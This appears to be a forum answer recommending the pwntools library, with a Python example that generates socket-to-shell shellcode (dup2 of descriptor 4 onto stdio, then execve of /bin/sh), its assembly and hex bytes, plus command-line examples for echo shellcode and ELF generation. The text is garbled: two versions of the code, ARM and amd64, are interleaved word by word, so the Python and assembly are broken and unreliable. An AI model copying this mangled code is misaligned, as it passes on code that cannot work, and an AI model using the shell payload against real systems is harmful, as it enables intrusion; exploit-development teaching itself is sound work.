Take a look at Pwnies'Gallopsled's pwntools. Does all the things you want it to, and has most of it built in already.
Here's a quick example of "I want to dup
file descriptor #4 (generallye.g. a connected TCP socket) to stdin/stdout/stderr, and pop a shell".
#!/usr/bin/env python
from pwn import *
context('arm','linux').arch #= Replace'amd64' either# withDefault i386/amd64/mips/etcarchitecture oris freebsdi386
scshellcode = shellcodeshellcraft.dupshdupio(4)
for block in+ scshellcraft.blocks:sh()
print shellcode
print '----'
print block.textenhex(asm(shellcode))
print '----'
print enhexhexdump(asm(scshellcode))
Prints out
# An example assemblying custompush assembly.4
# This works in x86/amd64pop rbp
push 3
pop rsi
dec rsi
js after_3
push rsi
/mips* call dup2('rbp', 'rsi') */arm
push SYS_dup2 /ppc* 0x21 */etc.
print enhex(asm(''' pop rax
mov r0rdi, #0rbp
bx lr syscall
jmp loop_2
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
Prints out
/* push '/bin///sh\x00' Set*/
r9 = 4 push 0x68
ldr r9 mov rax, =4
// Set r8 = 2push rax
ldr r8 mov rdi, =2rsp
/* push argument array ['sh\x00'] */
dup_helper: /* push 'sh\x00' */
mov r0 push 0x1010101 ^ 0x6873
xor dword ptr [rsp], r90x1010101
mov r1 xor esi, r8esi /* 0 */
svc SYS_dup2 push rsi /* null terminate */
adds r8, #-1 push 8
bpl dup_helper pop rsi
adr r0 add rsi, bin_shrsp
push rsi /* 'sh\x00' */
mov r2rsi, #0rsp
push {r0 xor edx, r2}edx /* 0 */
mov r1, sp /* call execve() */
svc push SYS_execve /* 0x3b */
bin_sh: .asciz " pop rax
00000000 6a 04 5d 6a 03 5e 48 ff ce 78 0b 56 6a 21 58 48 │j·]j│·^H·│·x·V│j!XH│
00000010 89 ef 0f 05 eb ef 6a 68 48 b8 2f 62 69 6e 2f 2f │····│··jh│H·/binb│in/sh"/│
00000020 2f 73 50 48 89 e7 68 72 69 01 01 81 34 24 01 01 │/sPH│··hr│i···│4$··│
00000030 01 01 31 f6 56 6a 08 5e 48 01 e6 56 48 89 e6 31 │··1·│Vj·^│H··V│H··1│
00000040 d2 6a 3b 58 0f 05 │·j;X│··│
They've also got nifty command-line tools for testing shellcode. For example:
$ pwn shellcraft -ci386.linux.echo "Hello world"
If you pipe it to a file or another program, raw binary is sent.
$ pwn shellcraft i386.linux.echo -c"Hello world" | xxd
00000000: 6801 0101 0181 3424 736d 6501 686f 2077 h.....4$sme.ho w
00000010: 6f68 4865 6c6c 6a04 586a 015b 89e1 6a0b ohHellj.Xj.[..j.
00000020: 5acd 80 Z..
You can print out the raw annotated assembly:
$ pwn shellcraft i386.linux.echo "Hello world" -f asm
/* push 'Hello world' */
push 0x1010101
xor dword ptr [esp], 0x1656d73
push 0x6f77206f
push 0x6c6c6548
/* call write('1', 'esp', 0xb) */
push SYS_write /* 4 */
pop eax
push (1) /* 1 */
pop ebx
mov ecx, esp
push 0xb
pop edx
int 0x80
Or generate an ELF:
$ pwn shellcraft i386.linux.echo "Hello world" |--format demo32elf > hello
$ file hello
hello: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
And even automatically execute or debug it:
$ worldpwn shellcraft ... --run
$ pwn shellcraft ... --debug
You can also assemble your own shellcode on the command-line:
$ pwn asm nop
$ pwn asm nop | xxd
00000000: 90 .